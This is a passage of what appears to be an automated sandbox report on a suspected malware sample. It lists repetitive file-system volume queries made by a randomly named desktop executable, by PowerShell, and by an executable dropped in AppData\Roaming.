Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Queries volume information: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
